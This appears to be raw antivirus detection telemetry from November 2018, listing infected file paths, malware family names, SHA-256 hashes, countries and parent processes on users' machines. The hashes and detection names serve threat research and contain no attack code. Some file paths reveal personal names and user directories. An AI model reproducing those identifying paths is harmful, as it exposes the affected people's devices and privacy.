  Row(detection=Row(filename='server.exe', filepath='C:\\temp\\server.exe', filesize=384000, name='TR/AD.Bladabindi.buhyf.#M1.#R1'), hash='7ce21869bd92bd470080368379e7feab16cdac0ab78ffee55db5b7b88e6fec45', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Desktop\\Trainer\\XSONICXFV2TRAINER(4)\\XSONICXFV2TRAINER\\FV2-XSONICX(Windows 64Bits)1.exe', parentsize=5195058, timestamp='2018-11-04T07:54:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='lg_ls770_en.htm', filepath='C:\\Program Files (x86)\\Octoplus\\Octoplus_LG\\MANUALS\\LG_LS770_EN.htm', filesize=392000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='94c34b095ea2036b080bd8ce1da0cf179e22a3b614e4169996710daa9f9b8f64', metadata=Row(cmdline=None, country='TN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe', parentsize=677024, timestamp='2018-11-04T19:16:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='offerswizarddata.dll', filepath='\\\\?\\E:\\PASTOR ELOY GARCIA C\\AppData\\Local\\{22C7451A-E175-48C7-89C2-8BEF85809BDD}\\OffersWizardData.dll', filesize=1792000, name='ADWARE/OffersWizard.1792000.#M1.#R1'), hash='68a5b5b209642b4dc351172859cb0cb7cdc19e6cdcbebc49be2b1209ea99e657', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:25:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='autorun.exe', filepath='E:\\Autorun.exe', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-04T13:32:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00062168', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp00062168', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T10:47:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-140958-373076c9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b9336ead\\AVSCAN-20181104-140917-336FA3A2\\AVSCAN-20181104-140958-373076C9', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:09:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-212618-7377dc77', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-204551-BE17A931\\AVSCAN-20181104-212618-7377DC77', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:26:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='32ac5b4c0cbec7debc03e163bc0cf52f948f65fbfaea82c323aae971b83f56c8', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries31.10.2018-29.available\\Avira\\32AC5B4C0CBEC7DEBC03E163BC0CF52F948F65FBFAEA82C323AAE971B83F56C8', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='32ac5b4c0cbec7debc03e163bc0cf52f948f65fbfaea82c323aae971b83f56c8', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-04T08:23:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181103-232340-823be029', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_89e497ab\\AVSCAN-20181103-230631-1EB43BCA\\AVSCAN-20181103-232340-823BE029', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:47:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dtsu2pausrv32.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\drp\\DP_Audio_wnt6-x86_1111\\drp\\x86\\S\\Realtek\\2\\DTSU2PAuSrv32.exe', filesize=256000, name='W32/Sality.AG.#M1.#R1'), hash='9747165e934ea35cceeff9e433b43095b25b52a5842a96643eaba52e88b70fc0', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='SA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=21504, timestamp='2018-11-04T06:11:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T02:45:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='opencv_haartraining.exe', filepath='\\\\?\\E:\\Programs\\Developer Pro\\OpenCV\\opencv\\build\\x64\\vc11\\bin\\opencv_haartraining.exe', filesize=256000, name='W32/Neshta.A.#M1.#R1'), hash='4995d3ea19a3182b0a8eb26e6ad01e19f3aad925c41ff6fc2d77cec4ceaa3886', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T08:58:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T11:29:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='b837bc21bde5f390a4a52063fb17f58f90525b4b', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\b837bc21bde5f390a4a52063fb17f58f90525b4b', filesize=2176000, name='HEUR/AGEN.1027095.#M1.#R1'), hash='3c306592257065f205c13ca6ae165701e8ef7d8407b57dac2f573b5f49587563', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T07:44:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='3ce845b71def4059502be3b85b3db4e1ec327bd04cffb0c62fe92ad57482fbca', metadata=Row(cmdline='\\\\\\/Embedding', country='SA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=428032, timestamp='2018-11-04T06:15:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T08:08:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-140240-f0d52426', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_10bae96c\\AVSCAN-20181104-140204-EA8B75B2\\AVSCAN-20181104-140240-F0D52426', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T09:10:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='object --> inv_no_p016999.doc', filepath='object --> Inv_No_P016999.doc', filesize=144000, name='W97M/Agent.34358338.#M0.#R0'), hash='e58d922700892df920699d42bab4fe2ca6aa50588a2c67cbd0840852af2e208a', metadata=Row(cmdline=None, country='IT', os_name='MacOS', os_vmajor='18', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T09:43:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msiexec64.exe', filepath='C:\\Program Files (x86)\\Common Files\\NTServices\\mSiexec64.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T22:38:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='updrgui.exe', filepath='C:\\Program Files\\Avira\\AntiVir Desktop\\updrgui.exe', filesize=400000, name='W32/Sality.Patched.#M1.#R1'), hash='a439b92467f19dafed9fcf6b5490215b3bcd9d3c3d2b25bd9943b64311c56d64', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T19:01:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='start.exe', filepath='C:\\Program Files\\PS2\\DarkWatch\\Start.exe', filesize=384000, name='W32/Induc.blr.#M1.#R1'), hash='ff0d467e79f866ad5236fa5ab416d25d62a028d787cf5118243fc907f518e178', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:905Qo9z8R0qnK8e3.1', country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=122560, timestamp='2018-11-02T03:28:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='updrgui.exe', filepath='C:\\Program Files (x86)\\Avira\\AntiVir Desktop\\updrgui.exe', filesize=400000, name='W32/Sality.Patched.#M1.#R1'), hash='bf9fe6ac3f922da11fcd4570b3dba1c67721a1e01c693be6e23c74dc620230ed', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:19:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='vbe6.dll', filepath='\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\VBA\\VBA6\\VBE6.DLL', filesize=2560000, name='W32/Ramnit.CD.#M1.#R1'), hash='c58874f818da4d0df60a86d6cac3d3b2b1d5230a5b6495a3f7c6a76c25a2361c', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:37:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-225121-6a6be14f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5732cab4\\AVSCAN-20181102-220138-CABA3555\\AVSCAN-20181102-225121-6A6BE14F', filesize=10368000, name='TR/Eroyee.f062a6.#M1.#R1'), hash='f062a67cda8a7166a774b121aaaed4283fc49b671084b55745a7262df0b7b65e', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:51:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wijpmnu.exe', filepath='c:\\users\\X\\appdata\\roaming\\wijpmnu.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='CA', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=454656, timestamp='2018-11-02T16:32:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='e_farngei.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\{DC7A9AF2-4E10-4F1C-BF23-AD934E0E5040}\\E_FARNGEI.EXE', filesize=256000, name='W32/Alman.BB.#M1.#R1'), hash='eaab00b64e7d7aca87ce13f2be71c5458af144a015a4909dccc13912705745a8', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T05:42:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='phieu lien lac.exe', filepath='G:\\\xa0\\phieu lien lac.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='eebe47d403a6c587bc4d9a37342fa4a91545fcec230d486d3bfb8780b0ee168f', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Microsoft Security Client\\MsMpEng.exe', parentsize=119864, timestamp='2018-11-02T11:59:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='b410a6704148eb20e63997ae4b1104ae4de0d0e4b1399558ba8dc8a8cf32cb88.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_28.10.2018-19.available\\Avira\\B410A6704148EB20E63997AE4B1104AE4DE0D0E4B1399558BA8DC8A8CF32CB88.VIR', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='b410a6704148eb20e63997ae4b1104ae4de0d0e4b1399558ba8dc8a8cf32cb88', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-02T05:49:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='oitqtgon.exe', filepath='c:\\users\\X\\appdata\\roaming\\oitqtgon.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=430592, timestamp='2018-11-02T19:33:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='folder settings.exe', filepath='I:\\ألعاب\\Games 1\\Dd251.N\\chars\\Gotenks SSJ\\Folder Settings\\Folder Settings.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='ed10620116ff807c926b797af19aff6d29c3d2376360ba0725cad89a8caae5ce', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='shpsqjzs.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\shpSQjZs.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:03:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ainslie.exe', filepath='/Users/ottohalter/Library/Containers/com.apple.mail/Data/Library/Mail Downloads/A36B9ABB-4978-4CF2-ADF0-A8F5FDC2E58A/ainslie.exe', filesize=576000, name='TR/Nivdort.Gen2.#M2.#R101522'), hash='951a29e32dbaf19adec39b5f6aaf100d69651698fab4a1e21118fec2adf3393e', metadata=Row(cmdline=None, country='CH', os_name='MacOS', os_vmajor='18', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T21:49:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='autokms.exe', filepath='C:\\Windows\\AutoKMS\\AutoKMS.exe', filesize=1856000, name='TR/Rogue.KDV.795271.1.#M1.#R1'), hash='ec418843efb4baeac8d80b9df6901e4860efda54941b64e346f97f9fde3a8994', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Microsoft Security Client\\MsMpEng.exe', parentsize=103696, timestamp='2018-11-02T08:10:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tpmagentservice.dll', filepath='C:\\Windows\\System32\\tpmagentservice.dll', filesize=576000, name='TR/Miner.eevge.#M1.#R1'), hash='f6fbbd041481cca2e5e9fd947cd34e0dc066cb16a26cae3b37465c5a59d3403f', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:21:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-064816-359e50c3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_06b5908c\\AVSCAN-20181102-064758-31C06270\\AVSCAN-20181102-064816-359E50C3', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:48:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='logagent.exe', filepath='\\\\?\\E:\\Windows.old\\WINDOWS\\SysWOW64\\logagent.exe', filesize=128000, name='W32/Neshta.A.#M1.#R1'), hash='8af5924403053c7628c53bbc6d724f093aee0339b2299ccbc4906489cc2b1974', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T11:01:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='cytexpert.exe', filepath='\\\\?\\C:\\Program Files\\CytExpert\\CytExpert.exe', filesize=67840000, name='HEUR/AGEN.1013859.#M1.#R1'), hash='df1d9515de837d35ea4344fb3b5bf25f667222764bc8a3df3250b962e2d27467', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:40:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-025859-e879059b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4d3016c4\\AVSCAN-20181102-005854-FC38E0AB\\AVSCAN-20181102-025859-E879059B', filesize=128000, name='ADWARE/Adware.Gen7.#M1.#R1'), hash='b33ad7d6f22ca8a8556926cd6bb0e8d8fc9962e540ed2ca3200e75a5735c3c72', metadata=Row(cmdline=None, country='MA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:58:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='df5f7e0182e1719ab5ef18eb7bf9522d_177e6c1d.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-02_20-58-22\\df5f7e0182e1719ab5ef18eb7bf9522d_177e6c1d.exe', filesize=2496000, name='HEUR/AGEN.1007445.#M1.#R1'), hash='8a0ba8074f6d157cac3a04b807bbdbe6b8cfb2e6b109d7c90b71523d52e9537e', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe70_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe70 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-02T20:06:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='e3e9856fceaf2e00244e8dea7ca6ec30b76af573e21cd489c56aee73f5ca45d5', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=4848952, timestamp='2018-11-02T10:18:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='service.vir', filepath='\\\\?\\C:\\Applications\\Service.VIR', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='PE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T19:18:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='soundtrax.exe', filepath='F:\\all items\\Allimfo\\softwares\\Nero\\Nero OEM\\nero soundtrax\\SoundTrax.exe', filesize=1536000, name='TR/Patched.Gen.#M2.#R3367'), hash='d31728fbee6628f8bdecf11e57a367722f37839d13edfb193bc01746fcadf55d', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='10', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T09:03:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-155852-20f8131b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_16c56836\\AVSCAN-20181102-154554-D8738C57\\AVSCAN-20181102-155852-20F8131B', filesize=96000, name='PUA/FindWide.#M1.#R1'), hash='e6e84c26e6e540487262c987a40d0b375bc27032a101445842e8441bad6703cb', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:58:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='e5be2ddad834a524f8b2e52f8a89a795.smp', filepath='\\\\192.168.10.10\\SHARED\\_tools\\runtime\\scan\\tmp_1847004348\\e5be2ddad834a524f8b2e52f8a89a795.smp', filesize=10000000, name='TR/Dropper.Gen.#M300.#R3322'), hash='c94cf25d96ce1f2ed88e3ddbcc8fa06082e5d1343320546c5e70d67c507920a4', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\tools\\http_server\\http_server.exe', parentsize=6242816, timestamp='2018-11-02T23:47:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='prounstl.exe', filepath='E:\\Softwares\\Gagibite 61M\\Network\\Intel\\PRO1000\\Win32\\NDIS61\\PROUnstl.exe', filesize=368000, name='W32/Sality.AT.#M1.#R1'), hash='8a753fd74b70f884bc18915fd6ad16488c5ef7ee0adab0c84fcc9f41d9365ea2', metadata=Row(cmdline=None, country='LK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='D:\\SCIENTER\\RestManage\\RestManage.exe', parentsize=3473408, timestamp='2018-11-02T02:30:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-124852-c6480bbc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_823eb073\\AVSCAN-20181102-124834-C4643C90\\AVSCAN-20181102-124852-C6480BBC', filesize=1536000, name='TR/Dropper.Gen.#M1.#R1'), hash='fa27dc0aa4ce63e95f65ec478f4dc33437b2b25e63e12968539ad6ae053765ad', metadata=Row(cmdline=None, country='PT', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T12:34:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files (x86)\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='9c8d0a43aa95e439cede9b69cacfb3c606381bfd6745111c5cfe73a38af9ae38', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\ProKAward\\rsasws.exe', parentsize=98304, timestamp='2018-11-02T08:58:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dosyalarım.exe', filepath='K:\\Dosyalarım.exe', filesize=320000, name='TR/Patched.Ren.Gen.#M300.#R4976'), hash='be2e60a43d2533a585c6db1626abfab89e9c06272f03d3de6ceaec52b6de9cd0', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-02T11:36:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181104-193650-0b9db28b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2754a3e3\\AVSCAN-20181104-173744-35C87BC3\\AVSCAN-20181104-193650-0B9DB28B', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T18:36:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='b33bb3ac041c00d733a4b3cfe4358961e05a0060de27643c4c016f7d473d0541', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-33.categorizing\\B33BB3AC041C00D733A4B3CFE4358961E05A0060DE27643C4C016F7D473D0541', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='b33bb3ac041c00d733a4b3cfe4358961e05a0060de27643c4c016f7d473d0541', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T15:19:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='C:\\Windows\\Temp\\nsvA96A.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline='\\\\\\/MONITOR', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\CCleaner\\CCleaner.exe', parentsize=13797712, timestamp='2018-11-04T12:17:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='hrl18b.tmp', filepath='\\\\?\\D:\\Documents and Settings\\X\\Local Settings\\Temp\\hrl18B.tmp', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='c0fc4bfba45ba7de276c1a3e2ba91619b50e4a54a8c4b21c3447e7ec0da95007', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:04:34Z'), dt=datetime.date(2018, 11, 4)),
